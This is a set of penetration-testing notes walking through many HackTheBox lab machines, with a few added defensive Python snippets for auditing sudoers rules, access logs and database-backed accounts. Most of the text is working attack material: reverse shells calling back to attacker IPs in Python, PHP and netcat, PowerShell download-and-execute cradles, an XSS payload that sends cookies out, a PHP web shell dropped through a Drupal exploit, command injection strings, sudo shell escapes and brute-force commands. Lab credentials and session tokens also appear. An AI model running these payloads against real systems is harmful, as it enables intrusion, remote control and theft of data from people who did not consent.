# Machines Practice

#### Follow this Medium series by Rana for OSCP-style HackTheBox machine writeups without MSF :)

<https://medium.com/@ranakhalil101/>

## Swagshop

One way to get the root file:

```
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
```

2nd way:

```
www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell
```

3rd way:

```
sudo vi /var/www/html/a -c ':!/bin/sh'
```
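Why all three commands work, seen from the defender's side (an added example, not part of the original notes). It assumes the sudoers entry is `/usr/bin/vi /var/www/html/*`, which the page does not show; `audit_rule` and `matches_but_escapes` are names made up for this sketch.

```python
import fnmatch
import posixpath
import shlex

# Editors and pagers with built-in shell escapes: granting one through sudo
# grants a root shell no matter which file argument is allowed.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "less", "more", "nano", "ed", "man"}

# Assumed rule (not shown on the page) that would permit the commands above.
ASSUMED_RULE = "/usr/bin/vi /var/www/html/*"


def audit_rule(rule):
    """Return the findings for one sudoers command specification."""
    parts = shlex.split(rule)
    binary, args = parts[0], parts[1:]
    findings = []
    if posixpath.basename(binary) in SHELL_ESCAPE_BINARIES:
        findings.append("shell-escape-binary")
    if any(ch in arg for arg in args for ch in "*?["):
        findings.append("wildcard-argument")
    return findings


def matches_but_escapes(rule, invoked):
    """True if `invoked` satisfies the rule's wildcard yet resolves outside
    the directory the rule was meant to cover.

    sudo compares command arguments with shell-style wildcards in which '*'
    also matches '/', so '../' sequences pass the match unchanged.
    """
    rule_bin, rule_arg = shlex.split(rule)[:2]
    inv_bin, inv_arg = shlex.split(invoked)[:2]
    if rule_bin != inv_bin or not fnmatch.fnmatchcase(inv_arg, rule_arg):
        return False
    allowed_dir = posixpath.dirname(rule_arg)   # /var/www/html
    resolved = posixpath.normpath(inv_arg)      # collapses the ../ segments
    return not resolved.startswith(allowed_dir + "/")


if __name__ == "__main__":
    print(audit_rule(ASSUMED_RULE))
    for cmd in ("/usr/bin/vi /var/www/html/a",
                "/usr/bin/vi /var/www/html/../../../root/root.txt"):
        print(cmd, "->", matches_but_escapes(ASSUMED_RULE, cmd))
```

A rule that names one fixed file and goes through `sudoedit` instead of the editor binary produces neither finding.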

```
python magento_rce.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9001 >/tmp/f"
```

\=============================================================

## Arkham

```
nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt 10.10.10.130
```

```
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.130 --rate=700
```

```
smbmap -H 10.10.10.130 -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //10.10.10.130/BatShare 
```

\================================================================

## Bastion

```
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
```

```
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
```

05/10/2019

## Bashed:

```
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py
```

`/dev/shm` - writable directory

```
sudo -u scriptmanager bash
```

Upload a reverse shell if the normal shell is not working.

```
python -c 'import pty;pty.spawn("/bin/bash")'
```

`/usr/share/laudanum/php/php-reverse-shell.php`

\====================================================================

## Nibbles:

```
hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username"
```

Not working: the IP gets blocked.

cmd.php

GIF8;

```
find . | grep controllers
```

```
ldd --version
cat /etc/lsb-release
```

One solution to get root:

Create a file monitor.sh

/bin/sh

bash

Another trick for this Ubuntu version: the Rational Love exploit

<https://www.exploit-db.com/exploits/43775>

\===================================================

## Blue - Windows machine

EternalBlue: MS17-010

```
nmap -p 445 --script safe -Pn -n ip
nmap -p 445 --script "vuln and safe" -Pn -n ip
```

EternalBlue exploit, manually: <https://www.exploit-db.com/download/42030> <https://www.exploit-db.com/exploits/42315>

Modify the Python exploit and put in the location of our payload.

Exploit modification required.

Add the computer name to the hosts file and then scan the SMB servers:

```
smbclient -L //10.10.10.40 -N
smbclient //haris-pc/Users
```

```
python exploit.py ip ntsvcs
```

\===========================================================================

## Sense - Linux Machine - PFsense

<https://www.exploit-db.com/exploits/43560>

Manual command injection:

```
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port
```

```
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port|python
```

On the attacker machine, run this command:

```
nc -vnlp port < cmd
```

The file `cmd` contains this reverse shell code:

```
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.10",3456))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

```
nc -lvnp 3456
```

Exploit-DB exploit:

<https://www.exploit-db.com/exploits/43128>

\=====================================================

## Optimum

Port 80 is running HttpFileServer.

```
tcpdump -i tun0
```

```
%00{.exec|ping 10.10.14.10.}
```

Use Invoke-PowerShellTcp.ps1.

- `C:\Windows\SysWow64` - 32 bit windows
- `C:\Windows\system32` - 32 bit windows
- `C:\Windows\Sysnative` - 64 bit

```
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.10
```

Ctrl+Shift+U - to decode

```
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/Invoke-PowerShellTcp.ps1')
```

Run the Sherlock script to list missing patches; it can report false positives.

```
IEX(New-Object Net.WebClient).downloadString('http://ip:port/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 1234
```

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1')
Find-AllVulns
```

```
cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032
```

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Invoke-MS16032.ps1')
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.10:8000/shell.ps1')"
```

\====================================================

## Node - Linux

Port 3000 - Node

Password extraction:

```
sed 's/,/\n/g' notes
```

`api/users`

Crack the hashes online and offline.

Cracking hashes with hashcat and john:

```
hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt
john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt
cat /home/alamot/.john/john.pot
```

Online: hashes.org

```
grep -Ri password . | less
```

fcrackzip, a password cracker for zip files:

```
fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
```

Download the file with wget:

```
wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU" http://10.10.10.58:3000/api/admin/backup
```

```
base64 -d myplace.backup >myplace
```

```
mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler
```

Privesc to the tom user:

```
mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler
```

```
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
```

```
db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
```

```
find / -perm -4000 2>/dev/null
```

```
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "asd /bin/bash asd"
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 r??t/roo?.txt
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
```

Using a wildcard:

```
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /r**t/r**t.txt | base64 -d > root.zip
```

Command injection:

```
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"
```

\=====================================================

## Legacy - windows

Samba Scan

```
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
```

First exploit - MS08-067

```
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 10.10.10.4 6 445
```

```
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe
```

Host a file with smbserver:

```
smbserver.py a /usr/share/windows-binaries/
```

```
\\10.10.14.14\a\whoami.exe
```

\===========================================================

## Valentine

Heartbleed vulnerability

```
python heartbleed.py -n 100 ip
for i in $(seq 0 100); do python heartbleed.py ip; done
```

<https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py>

Then find hype.key (hex to ASCII).

It is an SSH key; use this key with the password obtained from Heartbleed:

```
ssh -i hype.key hype@ip
```

Check the history and check `ps elf | grep root`.

2nd exploit

<https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c>

```
gcc -pthread dirty.c -o dirty -lcrypt
```

```
su -
```

\==============================================

## Fuzzy web app challenge

```
gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
```

```
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
```

\======================================

## HDC HackTheBox Web Challenge Walkthrough/Solution

So the doProcess() function submits the form data to the jQuery. Then I had a look at jquery-3.2.1.js and searched (Ctrl+F) for doProcess().

Credentials are stored in the JS file, in the doProcess() function.

Find the emails in the secret folder, then run a brute force against all the emails and get the flag.

\=======================================

## Lernaean Web Challenge - HackTheBox

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593
```

\=========================================

## CARTOGRAPHER

username= `'-` and password= `'` - SQL injection

#### info=flag

## [20 Points] Lernaean [by Arrexel]

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414
```

\===========================================

## [50 Points] I know Mag1k [by rkmylo]

```
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"
```

\=======================================================

## Bastard - windows

Drupal payload changes:

```
$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

// PHP written to the target: one branch fetches a file, the other runs a command
$phpcode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>
EOD;

$file = [
    'filename' => 'sam.php',
    'data' => $phpcode
];
```

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8080/chimichurri.exe')
```

```
\\10.10.14.10\sam\ms15-051x64.exe "\\10.10.14.10\sam\nc64.exe -e cmd.exe 10.10.14.10 443"
[#] ms15-051 fixed by zcgonvh
```

```
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/Invoke-PowerShellTcp.ps1')
```

```
\\10.10.14.10\a\ms15-051x64.exe "\\10.10.14.10\a\nc64.exe -e cmd.exe 10.10.14.10 443"
```

```
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/mv.ps1')
```

```
curl http://10.10.10.9/0xdf.php?cmd=whoami
http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443
```

```
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')
```

Shell with Nishang

```
python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"
```

<https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip>

```
\\10.10.14.14\share\ms15-051x64.exe "whoami"
\\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"
```

\===================================================

## Poison

<http://10.10.10.84/browse.php?file=listfiles.php> - the machine is vulnerable to LFI.

Add this shell to the User-Agent header:

```
User-Agent: 0xdf: <?php system($_GET['c']); ?>
```

Then check the logs with `&c=id`.

connectivity check

```
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.14.6
tcpdump -i tun0 icmp
```

```
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=nc 10.10.14.6 8081
nc -lnvp 8081
```

Shell as WWW

Visit `view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f`,
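The chain above leaves two traces in the web server's access log: PHP tags in a client-controlled field, and a request whose parameter points an include at a log file. The following is an added example, not part of the original notes, that flags both in combined-format log lines; the sample lines and timestamps are constructed, and `classify` and `scan` are names made up here.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*)"$'
)
# PHP open tags have no business in a request line, Referer or User-Agent.
CODE_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# A query parameter whose value names a log file or the log directory.
LOG_INCLUDE = re.compile(
    r"[?&][^=&\s]+=[^&\s]*?(?:/var/log/|access[._-]?log|error[._-]?log)",
    re.IGNORECASE,
)

# Constructed sample, shaped like the requests in this section.
SAMPLE_LOG = """\
10.10.14.6 - - [10/Sep/2018:09:01:12 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.6 - - [10/Sep/2018:09:03:40 +0200] "GET / HTTP/1.1" 200 289 "-" "0xdf: <?php system($_GET['c']); ?>"
10.10.14.6 - - [10/Sep/2018:09:04:05 +0200] "GET /browse.php?file=/var/log/httpd-access.log&c=id HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def classify(line):
    """Return the set of findings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return {"unparsed"}
    tags = set()
    # URL-decode first so %3C%3Fphp is caught as well as the literal tag.
    fields = [unquote_plus(m[name]) for name in ("request", "referer", "agent")]
    if any(CODE_TAG.search(value) for value in fields):
        tags.add("code-in-log-field")
    if LOG_INCLUDE.search(fields[0]):
        tags.add("log-file-include")
    return tags


def scan(text):
    """Return [(line_number, sorted findings)] for every flagged line."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        tags = classify(line)
        if tags:
            hits.append((number, sorted(tags)))
    return hits


if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(number, tags)
```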

Listening on localhost:

```
 netstat -an -p tcp
 ps -auwwx | grep vnc
```

#### Tunneling / VNC connection

```
tail /etc/proxychains.conf
ssh charix@10.10.10.84 -D 8081
proxychains vncviewer 127.0.0.1:5901 -passwd secret
```

Looking inside `/root/.vnc/`, there’s a `passwd` file that matches the file `secret`:

```
python /opt/vncpasswd.py/vncpasswd.py -d -f secret
```

LFI filter: `php://filter/convert.base64-encode/resource=index.php`

Request to add data to a PHP variable that is visible in phpinfo:

```
Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166

----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"
Content-type:text/plain

Please share my videos
```

\====================================================

## Brainfuck:

```
python sshng2john.py id_rsa > brainfuck-crack
john brainfuck-crack --wordlist=/usr/share/wordlists/rockyou.txt
```

```
wpscan --url https://brainfuck.htb --disable-tls-checks
cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .
```

WordPress exploit -> SMTP creds -> SMTP creds to get the secret forum password -> encryption/decryption

<http://rumkin.com/tools/cipher/vigenere.php>

> `ssh2john id_rsa > id_john`
>
> `john id_john --wordlist=/usr/share/wordlists/rockyou.txt`

> In orestis' home directory there are a few files: debug.txt, encrypt.sage and output.txt. After some Google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large): <https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e>
>
> `python -c "print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, 'x').decode('hex')"`
>
> 6efc1a5dbb8904751ce6566a305bb8ef
>
> [![](https://dev-redteamtutorials-wp.pantheonsite.io/wp-content/uploads/2018/11/johndecrypted.png)](https://dev-redteamtutorials-wp.pantheonsite.io/wp-content/uploads/2018/11/johndecrypted.png)

\=================================================

## Grandparents (Granny & Grandpa)

```
iptables -A OUTPUT -d 10.10.10.14 -j DROP
```

```
davtest --url http://10.10.10.15
```

Check the MOVE option: move ippsec.html to destination ippsec.aspx.

MS14-070 exploit works for root; MS15-051 does not work.

```
curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.aspx
curl -X MOVE -H 'Destination: http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.txt
curl http://10.10.10.15/shell.aspx
```

Reverse shell on Metasploit

Check 3 exploits for privilege escalation: ms16-016, ms15-051, ms14-058 (working fine)

```
msf5 exploit(windows/local/ms14_058_track_popup_menu)
post(multi/recon/local_exploit_suggester)
```

Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow

Grandpa:

Use **exploit/windows/iis/iis_webdav_scstoragepathfromurl**. As we can see below, set options.

```
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
options
set RHOST 10.10.10.14
set LHOST <attacking machine ip>
set LPORT 1234
```

```
use exploit/windows/local/ms15_051_client_copy_image
options
```

\============================================

## Redcross

```
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20

```

XSS payload in the contact us form:

```
<script>new Image().src="http://10.10.14.14:8888/cookie.php?c="+document.cookie;</script>
```

SQLi

On submitting the UserID filter, I’m sent to `https://intra.redcross.htb/?o=1&page=app`, where `o=` is the id filtered on. If I try with a `'` in there, `https://intra.redcross.htb/?o=1'&page=app`:

```
 sqlmap -r app.request --delay=1 --batch --dump
 sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
```

```
nmap -p- --min-rate 5000 10.10.10.113
```

```
python 41162.py -c "ping -c 1 10.10.14.14" -t penelope@redcross.htb -m 10.10.10.113
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"10.10.14.14\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t penelope@redcross.htb -m 10.10.10.113
```

**Injection RCE**

<https://www.exploit-db.com/exploits/41162>

Burp Suite RCE:

```
ip=1;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.23",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny
```

#### Priv esc to penelope

```
s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross
```

#### Priv esc to root

```
penelope@redcross:/etc$ psql -h 127.0.0.1 -U unixnss -W unix
```

```
openssl passwd -1 0xdf
```

```
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');
```

#### Path 1: sudoers Group

```
insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su
```

#### Path 2: Via unixnssroot

```
unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');
```

**Find psql Configs**

```
ls -l nss-pgsql*
cat nss-pgsql-root.conf 
psql -h 127.0.0.1 -U unixnssroot -p 5432 -d unix
```

This user can add a user with user id 0 (root):

```
insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot
```

Using this account, we are able to create a new user with UID 0:

```
insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');
```
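Accounts served from `passwd_table` never appear in `/etc/passwd`, so a file-based account review misses every insert shown above. The following is an added example, not part of the original notes, that audits an export of the table for those rows; it assumes the rows are available as (username, uid, gid, homedir) tuples, and the sample rows, the `webuser1` account and the function names are constructed.

```python
# Groups that grant root-equivalent rights; gid 27 is the one used in Path 1.
PRIVILEGED_GIDS = {0: "root", 27: "sudo"}

# Constructed local accounts (the /etc/passwd side of the system).
LOCAL_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
penelope:x:1000:1000::/home/penelope:/bin/bash
"""

# Constructed export of passwd_table: (username, uid, gid, homedir).
# uid None means the insert left the column at its default.
ROWS = [
    ("webuser1", 2020, 1001, "/home/webuser1"),
    ("penel0xdf", None, 1000, "/home/penelope"),
    ("sud0xdfer", None, 27, "/home/penelope"),
    ("r0xdfot", 0, 0, "/root"),
]


def local_homes(passwd_text):
    """Map each home directory in passwd-format text to its owning account."""
    homes = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7:
            homes[fields[5]] = fields[0]
    return homes


def audit_rows(rows, passwd_text=LOCAL_PASSWD):
    """Return {username: [findings]} for database-backed accounts that carry
    root's uid, a privileged group, or another account's home directory."""
    homes = local_homes(passwd_text)
    report = {}
    for username, uid, gid, homedir in rows:
        findings = []
        if uid == 0:
            findings.append("uid-0")
        if gid in PRIVILEGED_GIDS:
            findings.append("privileged-gid:" + PRIVILEGED_GIDS[gid])
        owner = homes.get(homedir)
        if owner and owner != username:
            findings.append("shares-home-with:" + owner)
        if findings:
            report[username] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_rows(ROWS).items():
        print(name, findings)
```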
